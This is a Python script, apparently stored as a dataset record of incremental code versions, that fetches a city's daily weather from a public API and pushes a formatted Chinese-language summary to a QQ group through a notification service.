except Exception as e:
raise e
else:
return 'success'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
try:
api = 'http://t.weather.itboy.net/api/weather/city/'
city_code = '101070201'
tqurl = api + city_code
response = requests.get(tqurl)
d = response.json()
print(d['status'])
if d['status'] == 200:
parent = d['cityInfo']['parent']
city = d['cityInfo']['city']
update_time = d['time']
date = d['data']['forecast'][0]['ymd']
week = d['data']['forecast'][0]['week']
weather_type = d['data']['forecast'][0]['type']
wendu_high = d['data']['forecast'][0]['high']
wendu_low = d['data']['forecast'][0]['low']
shidu = d['data']['shidu']
pm25 = str(d['data']['pm25'])
pm10 = str(d['data']['pm10'])
quality = d['data']['quality']
fx = d['data']['forecast'][0]['fx']
fl = d['data']['forecast'][0]['fl']
ganmao = d['data']['ganmao']
tips = d['data']['forecast'][0]['notice']
cpurl = 'https://push.xuthus.cc/group/' + key
tdwt = ('-----------------------------------------' +
'\n【今日份天气】\n城市: ' + parent + city + '\n日期: ' + date +
'\n星期: ' + week + '\n天气: ' + weather_type + '\n温度: ' +
wendu_high + ' / ' + wendu_low + '\n湿度: ' + shidu +
'\nPM25: ' + pm25 + '\nPM10: ' + pm10 + '\n空气质量: ' +
quality + '\n风力风向: ' + fx + fl + '\n感冒指数: ' + ganmao +
'\n温馨提示: ' + tips + '\n更新时间: ' + update_time)
print(tdwt)
requests.post(cpurl, tdwt.encode('utf-8'))
except:
error = '【出现错误】\n\u3000\u3000今日天气推送错误,请检查服务或网络状态!'
print(error)
def main_handler(event, context):
try:
main()
except Exception as e:
raise e
else:
return 'success'
if __name__ == '__main__':
print(main_handler({}, {}))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
key = ''
def main():
try:
api = 'http://t.weather.itboy.net/api/weather/city/'
city_code = '101070201'
tqurl = api + city_code
response = requests.get(tqurl)
d = response.json()
print(d['status'])
if d['status'] == 200:
parent = d['cityInfo']['parent']
city = d['cityInfo']['city']
update_time = d['time']
date = d['data']['forecast'][0]['ymd']
week = d['data']['forecast'][0]['week']
weather_type = d['data']['forecast'][0]['type']
wendu_high = d['data']['forecast'][0]['high']
wendu_low = d['data']['forecast'][0]['low']
shidu = d['data']['shidu']
pm25 = str(d['data']['pm25'])
pm10 = str(d['data']['pm10'])
quality = d['data']['quality']
fx = d['data']['forecast'][0]['fx']
fl = d['data']['forecast'][0]['fl']
ganmao = d['data']['ganmao']
tips = d['data']['forecast'][0]['notice']
cpurl = 'https://push.xuthus.cc/group/' + key
tdwt = ('-----------------------------------------' +
'\n【今日份天气】\n城市: ' + parent + city + '\n日期: ' + date +
'\n星期: ' + week + '\n天气: ' + weather_type + '\n温度: ' +
wendu_high + ' / ' + wendu_low + '\n湿度: ' + shidu +
'\nPM25: ' + pm25 + '\nPM10: ' + pm10 + '\n空气质量: ' +
quality + '\n风力风向: ' + fx + fl + '\n感冒指数: ' + ganmao +
'\n温馨提示: ' + tips + '\n更新时间: ' + update_time)
print(tdwt)
requests.post(cpurl, tdwt.encode('utf-8'))
except:
error = '【出现错误】\n\u3000\u3000今日天气推送错误,请检查服务或网络状态!'
print(error)
def main_handler(event, context):
try:
main()
except Exception as e:
raise e
else:
return 'success'
if __name__ == '__main__':
print(main_handler({}, {}))
<|reserved_special_token_1|>
import requests
key = ''
def main():
try:
api = 'http://t.weather.itboy.net/api/weather/city/'
city_code = '101070201'
tqurl = api + city_code
response = requests.get(tqurl)
d = response.json()
print(d['status'])
if d['status'] == 200:
parent = d['cityInfo']['parent']
city = d['cityInfo']['city']
update_time = d['time']
date = d['data']['forecast'][0]['ymd']
week = d['data']['forecast'][0]['week']
weather_type = d['data']['forecast'][0]['type']
wendu_high = d['data']['forecast'][0]['high']
wendu_low = d['data']['forecast'][0]['low']
shidu = d['data']['shidu']
pm25 = str(d['data']['pm25'])
pm10 = str(d['data']['pm10'])
quality = d['data']['quality']
fx = d['data']['forecast'][0]['fx']
fl = d['data']['forecast'][0]['fl']
ganmao = d['data']['ganmao']
tips = d['data']['forecast'][0]['notice']
cpurl = 'https://push.xuthus.cc/group/' + key
tdwt = ('-----------------------------------------' +
'\n【今日份天气】\n城市: ' + parent + city + '\n日期: ' + date +
'\n星期: ' + week + '\n天气: ' + weather_type + '\n温度: ' +
wendu_high + ' / ' + wendu_low + '\n湿度: ' + shidu +
'\nPM25: ' + pm25 + '\nPM10: ' + pm10 + '\n空气质量: ' +
quality + '\n风力风向: ' + fx + fl + '\n感冒指数: ' + ganmao +
'\n温馨提示: ' + tips + '\n更新时间: ' + update_time)
print(tdwt)
requests.post(cpurl, tdwt.encode('utf-8'))
except:
error = '【出现错误】\n\u3000\u3000今日天气推送错误,请检查服务或网络状态!'
print(error)
def main_handler(event, context):
try:
main()
except Exception as e:
raise e
else:
return 'success'
if __name__ == '__main__':
print(main_handler({}, {}))
<|reserved_special_token_1|>
import requests
# QQ push service; see https://cp.xuthus.cc/ to apply for a push key
key = ''
def main():
try:
        api = 'http://t.weather.itboy.net/api/weather/city/'  # API base URL; must be combined with a city code
        city_code = '101070201'  # look up your own city code at https://where.heweather.com/index.html
tqurl = api + city_code
response = requests.get(tqurl)
        d = response.json()  # parse the response as JSON; d holds the returned data
print(d['status'])
        if (d['status'] == 200):  # when the returned status code is 200, report the weather
            parent = d["cityInfo"]["parent"]  # province
            city = d["cityInfo"]["city"]  # city
            update_time = d["time"]  # update time
            date = d["data"]["forecast"][0]["ymd"]  # date
            week = d["data"]["forecast"][0]["week"]  # day of the week
            weather_type = d["data"]["forecast"][0]["type"]  # weather type
            wendu_high = d["data"]["forecast"][0]["high"]  # high temperature
            wendu_low = d["data"]["forecast"][0]["low"]  # low temperature
            shidu = d["data"]["shidu"]  # humidity
            pm25 = str(d["data"]["pm25"])  # PM2.5
            pm10 = str(d["data"]["pm10"])  # PM10
            quality = d["data"]["quality"]  # air quality
            fx = d["data"]["forecast"][0]["fx"]  # wind direction
            fl = d["data"]["forecast"][0]["fl"]  # wind force
            ganmao = d["data"]["ganmao"]  # cold/flu index
            tips = d["data"]["forecast"][0]["notice"]  # friendly tip
            cpurl = "https://push.xuthus.cc/group/" + key  # push to a QQ group
            # cpurl = '<request URL>/send/' + spkey  # push to an individual QQ instead of a group
            # weather message body
tdwt ="-----------------------------------------" + "\n【今日份天气】\n城市: " + parent + city + \
"\n日期: " + date + "\n星期: " + week + "\n天气: " + weather_type + "\n温度: " + wendu_high + " / " + wendu_low + "\n湿度: " + \
shidu + "\nPM25: " + pm25 + "\nPM10: " + pm10 + "\n空气质量: " + quality + \
"\n风力风向: " + fx + fl + "\n感冒指数: " + ganmao + "\n温馨提示: " + tips + "\n更新时间: " + update_time
print(tdwt)
            requests.post(cpurl, tdwt.encode('utf-8'))  # encode the weather text as UTF-8, otherwise the request errors out
except:
error = '【出现错误】\n 今日天气推送错误,请检查服务或网络状态!'
print(error)
def main_handler(event, context):
try:
main()
except Exception as e:
raise e
else:
return 'success'
if __name__ == '__main__':
# print(extension)
print(main_handler({}, {}))
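# Note: key must be filled in with a valid push.xuthus.cc group key before the push
# can succeed. main_handler(event, context) looks like a cloud-function entry point
# (e.g. a Tencent SCF-style handler); that deployment target is an assumption, since
# the script itself does not state it.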
|
flexible
|
{
"blob_id": "4048d7bfc7922ef76d98d43e1ea266e732e0982e",
"index": 9111,
"step-1": "<mask token>\n\n\ndef main():\n try:\n api = 'http://t.weather.itboy.net/api/weather/city/'\n city_code = '101070201'\n tqurl = api + city_code\n response = requests.get(tqurl)\n d = response.json()\n print(d['status'])\n if d['status'] == 200:\n parent = d['cityInfo']['parent']\n city = d['cityInfo']['city']\n update_time = d['time']\n date = d['data']['forecast'][0]['ymd']\n week = d['data']['forecast'][0]['week']\n weather_type = d['data']['forecast'][0]['type']\n wendu_high = d['data']['forecast'][0]['high']\n wendu_low = d['data']['forecast'][0]['low']\n shidu = d['data']['shidu']\n pm25 = str(d['data']['pm25'])\n pm10 = str(d['data']['pm10'])\n quality = d['data']['quality']\n fx = d['data']['forecast'][0]['fx']\n fl = d['data']['forecast'][0]['fl']\n ganmao = d['data']['ganmao']\n tips = d['data']['forecast'][0]['notice']\n cpurl = 'https://push.xuthus.cc/group/' + key\n tdwt = ('-----------------------------------------' +\n '\\n【今日份天气】\\n城市: ' + parent + city + '\\n日期: ' + date +\n '\\n星期: ' + week + '\\n天气: ' + weather_type + '\\n温度: ' +\n wendu_high + ' / ' + wendu_low + '\\n湿度: ' + shidu +\n '\\nPM25: ' + pm25 + '\\nPM10: ' + pm10 + '\\n空气质量: ' +\n quality + '\\n风力风向: ' + fx + fl + '\\n感冒指数: ' + ganmao +\n '\\n温馨提示: ' + tips + '\\n更新时间: ' + update_time)\n print(tdwt)\n requests.post(cpurl, tdwt.encode('utf-8'))\n except:\n error = '【出现错误】\\n\\u3000\\u3000今日天气推送错误,请检查服务或网络状态!'\n print(error)\n\n\ndef main_handler(event, context):\n try:\n main()\n except Exception as e:\n raise e\n else:\n return 'success'\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n try:\n api = 'http://t.weather.itboy.net/api/weather/city/'\n city_code = '101070201'\n tqurl = api + city_code\n response = requests.get(tqurl)\n d = response.json()\n print(d['status'])\n if d['status'] == 200:\n parent = d['cityInfo']['parent']\n city = d['cityInfo']['city']\n update_time = d['time']\n date = d['data']['forecast'][0]['ymd']\n week = d['data']['forecast'][0]['week']\n weather_type = d['data']['forecast'][0]['type']\n wendu_high = d['data']['forecast'][0]['high']\n wendu_low = d['data']['forecast'][0]['low']\n shidu = d['data']['shidu']\n pm25 = str(d['data']['pm25'])\n pm10 = str(d['data']['pm10'])\n quality = d['data']['quality']\n fx = d['data']['forecast'][0]['fx']\n fl = d['data']['forecast'][0]['fl']\n ganmao = d['data']['ganmao']\n tips = d['data']['forecast'][0]['notice']\n cpurl = 'https://push.xuthus.cc/group/' + key\n tdwt = ('-----------------------------------------' +\n '\\n【今日份天气】\\n城市: ' + parent + city + '\\n日期: ' + date +\n '\\n星期: ' + week + '\\n天气: ' + weather_type + '\\n温度: ' +\n wendu_high + ' / ' + wendu_low + '\\n湿度: ' + shidu +\n '\\nPM25: ' + pm25 + '\\nPM10: ' + pm10 + '\\n空气质量: ' +\n quality + '\\n风力风向: ' + fx + fl + '\\n感冒指数: ' + ganmao +\n '\\n温馨提示: ' + tips + '\\n更新时间: ' + update_time)\n print(tdwt)\n requests.post(cpurl, tdwt.encode('utf-8'))\n except:\n error = '【出现错误】\\n\\u3000\\u3000今日天气推送错误,请检查服务或网络状态!'\n print(error)\n\n\ndef main_handler(event, context):\n try:\n main()\n except Exception as e:\n raise e\n else:\n return 'success'\n\n\nif __name__ == '__main__':\n print(main_handler({}, {}))\n",
"step-3": "<mask token>\nkey = ''\n\n\ndef main():\n try:\n api = 'http://t.weather.itboy.net/api/weather/city/'\n city_code = '101070201'\n tqurl = api + city_code\n response = requests.get(tqurl)\n d = response.json()\n print(d['status'])\n if d['status'] == 200:\n parent = d['cityInfo']['parent']\n city = d['cityInfo']['city']\n update_time = d['time']\n date = d['data']['forecast'][0]['ymd']\n week = d['data']['forecast'][0]['week']\n weather_type = d['data']['forecast'][0]['type']\n wendu_high = d['data']['forecast'][0]['high']\n wendu_low = d['data']['forecast'][0]['low']\n shidu = d['data']['shidu']\n pm25 = str(d['data']['pm25'])\n pm10 = str(d['data']['pm10'])\n quality = d['data']['quality']\n fx = d['data']['forecast'][0]['fx']\n fl = d['data']['forecast'][0]['fl']\n ganmao = d['data']['ganmao']\n tips = d['data']['forecast'][0]['notice']\n cpurl = 'https://push.xuthus.cc/group/' + key\n tdwt = ('-----------------------------------------' +\n '\\n【今日份天气】\\n城市: ' + parent + city + '\\n日期: ' + date +\n '\\n星期: ' + week + '\\n天气: ' + weather_type + '\\n温度: ' +\n wendu_high + ' / ' + wendu_low + '\\n湿度: ' + shidu +\n '\\nPM25: ' + pm25 + '\\nPM10: ' + pm10 + '\\n空气质量: ' +\n quality + '\\n风力风向: ' + fx + fl + '\\n感冒指数: ' + ganmao +\n '\\n温馨提示: ' + tips + '\\n更新时间: ' + update_time)\n print(tdwt)\n requests.post(cpurl, tdwt.encode('utf-8'))\n except:\n error = '【出现错误】\\n\\u3000\\u3000今日天气推送错误,请检查服务或网络状态!'\n print(error)\n\n\ndef main_handler(event, context):\n try:\n main()\n except Exception as e:\n raise e\n else:\n return 'success'\n\n\nif __name__ == '__main__':\n print(main_handler({}, {}))\n",
"step-4": "import requests\nkey = ''\n\n\ndef main():\n try:\n api = 'http://t.weather.itboy.net/api/weather/city/'\n city_code = '101070201'\n tqurl = api + city_code\n response = requests.get(tqurl)\n d = response.json()\n print(d['status'])\n if d['status'] == 200:\n parent = d['cityInfo']['parent']\n city = d['cityInfo']['city']\n update_time = d['time']\n date = d['data']['forecast'][0]['ymd']\n week = d['data']['forecast'][0]['week']\n weather_type = d['data']['forecast'][0]['type']\n wendu_high = d['data']['forecast'][0]['high']\n wendu_low = d['data']['forecast'][0]['low']\n shidu = d['data']['shidu']\n pm25 = str(d['data']['pm25'])\n pm10 = str(d['data']['pm10'])\n quality = d['data']['quality']\n fx = d['data']['forecast'][0]['fx']\n fl = d['data']['forecast'][0]['fl']\n ganmao = d['data']['ganmao']\n tips = d['data']['forecast'][0]['notice']\n cpurl = 'https://push.xuthus.cc/group/' + key\n tdwt = ('-----------------------------------------' +\n '\\n【今日份天气】\\n城市: ' + parent + city + '\\n日期: ' + date +\n '\\n星期: ' + week + '\\n天气: ' + weather_type + '\\n温度: ' +\n wendu_high + ' / ' + wendu_low + '\\n湿度: ' + shidu +\n '\\nPM25: ' + pm25 + '\\nPM10: ' + pm10 + '\\n空气质量: ' +\n quality + '\\n风力风向: ' + fx + fl + '\\n感冒指数: ' + ganmao +\n '\\n温馨提示: ' + tips + '\\n更新时间: ' + update_time)\n print(tdwt)\n requests.post(cpurl, tdwt.encode('utf-8'))\n except:\n error = '【出现错误】\\n\\u3000\\u3000今日天气推送错误,请检查服务或网络状态!'\n print(error)\n\n\ndef main_handler(event, context):\n try:\n main()\n except Exception as e:\n raise e\n else:\n return 'success'\n\n\nif __name__ == '__main__':\n print(main_handler({}, {}))\n",
"step-5": "\nimport requests\n# qq推送 申请参考https://cp.xuthus.cc/\nkey = ''\ndef main():\n try:\n api = 'http://t.weather.itboy.net/api/weather/city/' # API地址,必须配合城市代码使用\n city_code = '101070201' # 进入https://where.heweather.com/index.html查询你的城市代码\n tqurl = api + city_code\n response = requests.get(tqurl)\n d = response.json() # 将数据以json形式返回,这个d就是返回的json数据\n print(d['status'])\n if (d['status'] == 200): # 当返回状态码为200,输出天气状况\n parent = d[\"cityInfo\"][\"parent\"] # 省\n city = d[\"cityInfo\"][\"city\"] # 市\n update_time = d[\"time\"] # 更新时间\n date = d[\"data\"][\"forecast\"][0][\"ymd\"] # 日期\n week = d[\"data\"][\"forecast\"][0][\"week\"] # 星期\n weather_type = d[\"data\"][\"forecast\"][0][\"type\"] # 天气\n wendu_high = d[\"data\"][\"forecast\"][0][\"high\"] # 最高温度\n wendu_low = d[\"data\"][\"forecast\"][0][\"low\"] # 最低温度\n shidu = d[\"data\"][\"shidu\"] # 湿度\n pm25 = str(d[\"data\"][\"pm25\"]) # PM2.5\n pm10 = str(d[\"data\"][\"pm10\"]) # PM10\n quality = d[\"data\"][\"quality\"] # 天气质量\n fx = d[\"data\"][\"forecast\"][0][\"fx\"] # 风向\n fl = d[\"data\"][\"forecast\"][0][\"fl\"] # 风力\n ganmao = d[\"data\"][\"ganmao\"] # 感冒指数\n tips = d[\"data\"][\"forecast\"][0][\"notice\"] # 温馨提示\n cpurl = \"https://push.xuthus.cc/group/\" + key # 推送到QQ群\n # cpurl = '[/font][/size][size=4][font=宋体][size=4][font=宋体]请求地址[/font][/size]/send/'+spkey #推送到个人QQ\n # 天气提示内容\n tdwt =\"-----------------------------------------\" + \"\\n【今日份天气】\\n城市: \" + parent + city + \\\n \"\\n日期: \" + date + \"\\n星期: \" + week + \"\\n天气: \" + weather_type + \"\\n温度: \" + wendu_high + \" / \" + wendu_low + \"\\n湿度: \" + \\\n shidu + \"\\nPM25: \" + pm25 + \"\\nPM10: \" + pm10 + \"\\n空气质量: \" + quality + \\\n \"\\n风力风向: \" + fx + fl + \"\\n感冒指数: \" + ganmao + \"\\n温馨提示: \" + tips + \"\\n更新时间: \" + update_time\n print(tdwt)\n requests.post(cpurl, tdwt.encode('utf-8')) # 把天气数据转换成UTF-8格式,不然要报错。\n except:\n error = '【出现错误】\\n 今日天气推送错误,请检查服务或网络状态!'\n print(error)\n\ndef main_handler(event, context):\n try:\n main()\n except Exception as e:\n raise e\n else:\n return 'success'\n\nif __name__ == '__main__':\n # print(extension)\n print(main_handler({}, {}))",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |